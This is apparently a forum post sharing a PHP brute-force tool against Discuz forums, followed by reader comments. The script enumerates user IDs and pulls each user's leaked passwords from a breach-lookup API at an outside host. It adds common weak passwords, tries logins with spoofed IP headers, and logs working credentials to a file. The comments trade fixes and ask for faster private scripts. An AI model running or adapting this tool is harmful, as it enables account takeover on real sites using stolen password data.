<?php
class fuckdz{
public function sgk($user){
$a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");
$a=iconv("UTF-8", "GB2312//IGNORE", $a);
preg_match_all("/7%\">(.*)</isU",$a,$arr);
unset($arr[0]);
foreach ($arr as $key=>$r){
return $r;
}
}
public function getuid($host,$uid){
$a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid");
if(!strpos($a,"charset=gbk")){
$a=iconv("UTF-8", "GB2312//IGNORE", $a);
}
preg_match("/<title>(.*)的/isU",$a,$arr);
$a=str_replace("\r","",trim($arr[1]));
return $a=str_replace("\n","",$a);
}
public function is_pass($host,$user,$pass){
$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
$opts = array (
'http' => array (
'method' => 'GET',
'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",
'timeout'=>15, )
);
$context = stream_context_create($opts);
$a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context);
if(strpos($a,"window.location.href")){
return true;
}else{
return false;
}
}
public function crack($host,$a,$b){
$host=str_replace("http://","",$host);
$host="http://".$host."/";
for($vip=$a;$vip<=$b;$vip++){
$user=$this->getuid($host,$vip);
$pass=$this->sgk($user);
array_push($pass,"123456");
array_push($pass,"654321");
array_push($pass,"123123");
array_push($pass,"woaini");
array_push($pass,"caonima");
array_push($pass,"12345");
array_push($pass,"12345789");
array_push($pass,"5201314");
array_push($pass,"1314520");
array_push($pass,$user);
array_push($pass,$user."123456");
array_push($pass,"abc123");
array_push($pass,$user."..");
for($i=0;isset($pass[$i]);$i++){
echo "\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i]."";
if($this->is_pass($host,$user,$pass[$i])){
echo "爆破成功!";
break;
file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND);
}else{
echo "爆破失败";
}
}
}
}
}
$f=new fuckdz();
error_reporting(0);
set_time_limit(0);
if(empty($argv[1])){
print_r("
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
开始爆破:php.exe $argv[0] 网址 起始uid 结束uid
示例: php.exe $argv[0] http://phpinfo.me/ 1 255
结果保存在ok.txt里
Blog:http://phpinfo.me
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n\n\n
");
}else{
if(!empty($argv[1])){
$f->crack($argv[1],$argv[2],$argv[3]);
}else{
echo "逗比";
}
}
?>
开启手机验证码就不行了...
相关讨论:
1#
Siro | 2014-06-02 08:05
必须收藏……
2#
大白菜 | 2014-06-02 08:11
...不能调用社工库的API爆破?
3#
Sunshie (http://phpinfo.me欢迎友链) | 2014-06-02 08:12
@大白菜 本来就是调用社工库来爆破的
4#
围剿 | 2014-06-02 08:18
好东西 这个必须收藏!!亮点是社工库api啊。。
5#
小威 (呵呵复呵呵,女神敲回车!) | 2014-06-02 08:27
已收藏
6#
围剿 | 2014-06-02 09:09
@Sunshie api能用?我测试的api无效呢。
7#
侠之心 | 2014-06-02 10:36
我全部爆破失败了 凑
8#
null (#) | 2014-06-02 11:30
这么屌?
9#
Sunshie (http://phpinfo.me欢迎友链) | 2014-06-02 11:31
@侠之心 修改了下..http://phpinfo.me/2014/06/02/630.html
10#
stranger_1 (i am a stranger) | 2014-06-02 11:40
73,74行 对换 不然就看不到ok.txt 喽··
11#
thx | 2014-06-02 11:44
没法无视验证码啊
12#
侠之心 | 2014-06-02 11:51
@Sunshie 楼主 还是全部都是爆破失败
13#
侠之心 | 2014-06-02 11:54
@Sunshie 系不系这几个社工库不给力啊
14#
侠之心 | 2014-06-02 11:57
@stranger_1 正解
15#
null (#) | 2014-06-02 12:12
@stranger_1 换了也没看见传说中的ok.txt
16#
小胖子 (VIP你快回来,园长欺负我!) | 2014-06-02 12:14
给力
17#
phith0n (www.leavesongs.com) | 2014-06-02 12:32
没多线程速度怎么保证?
我有个py脚本用了很久了,速度快成功率高,不过我才不会发出来,哈哈~~
18#
′ 雨。 | 2014-06-02 12:48
@phith0n 我擦 师傅咋没给我说过。
19#
侠之心 | 2014-06-02 12:52
@null 那是因为没有成功一个 所以没出来 ok.txt
20#
侠之心 | 2014-06-02 12:53
@phith0n 。。。。。。。。。。。。。
求私聊 给脚本
21#
null (#) | 2014-06-02 12:58
@侠之心 生成在根目录了,现在看见了。
22#
侠之心 | 2014-06-02 13:09
@null 我还没成功过 凑
23#
LauRen (不登高山,不知天之高也;不临深溪,不知地之厚也。) | 2014-06-02 13:25
mark
留言评论(旧系统):